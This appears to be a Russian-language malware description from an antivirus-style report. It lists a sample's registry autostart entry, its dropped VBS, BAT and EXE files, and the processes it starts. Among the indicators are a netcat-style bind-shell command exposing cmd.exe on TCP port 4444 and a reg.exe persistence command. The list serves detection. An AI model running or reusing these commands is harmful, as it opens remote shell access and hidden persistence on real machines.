Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'System Security' = '"<SYSTEM32>\adset.vbs"'
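- <SYSTEM32>\autodit.exe -l -p 4444 -e cmd.exe -L (судя по аргументам в стиле netcat, процесс прослушивает TCP-порт 4444 и передаёт подключившейся стороне cmd.exe; признак для обнаружения — слушающий сокет и входящие соединения на этом порту)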
- <SYSTEM32>\reg.exe add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v System" "Security /d \"<SYSTEM32>\adset.vbs\" (этой командой создаётся параметр автозапуска 'System Security' в ключе Run, указанный выше)
- <SYSTEM32>\ipconfig.exe
- <SYSTEM32>\wscript.exe "<SYSTEM32>\adset.vbs"
- <SYSTEM32>\cmd.exe /c ""<SYSTEM32>\contry.bat" "
- <SYSTEM32>\adset.vbs
- <SYSTEM32>\contry.bat
- <SYSTEM32>\autodit.exe
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''